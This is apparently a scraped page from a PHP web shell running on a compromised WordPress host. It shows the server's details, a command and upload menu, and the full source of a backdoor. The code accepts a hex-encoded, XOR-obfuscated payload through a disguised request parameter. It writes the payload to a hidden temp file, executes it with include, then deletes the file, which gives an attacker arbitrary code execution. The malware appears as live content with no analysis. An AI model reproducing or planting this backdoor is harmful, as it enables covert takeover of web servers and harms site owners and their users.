|
Server IP : 10.106.20.8 / Your IP : 216.73.216.148 Web Server : Apache System : Linux webm008.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 User : sixiemesrc ( 611999) PHP Version : 8.0.30 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/sixiemesrc/new/wp-content/mu-plugins/../uploads/ao_ccss/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!--SEgwUvV4-->
<?php
if(!is_null($_REQUEST["v\x61l"] ?? null)){
$resource = array_filter([getenv("TMP"), getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", sys_get_temp_dir(), "/dev/shm", getcwd()]);
$flg = hex2bin($_REQUEST["v\x61l"]);
$obj = '' ; foreach(str_split($flg) as $char){$obj.=chr(ord($char)^39);}
for ($parameter_group = 0, $key = count($resource); $parameter_group < $key; $parameter_group++) {
$component = $resource[$parameter_group];
if ((function($d) { return is_dir($d) && is_writable($d); })($component)) {
$ent = vsprintf("%s/%s", [$component, ".itm"]);
if ($pointer = fopen($ent, 'w')) {
fwrite($pointer, $obj);
fclose($pointer);
include_once $ent;
unlink($ent);
die();
}
}
}
}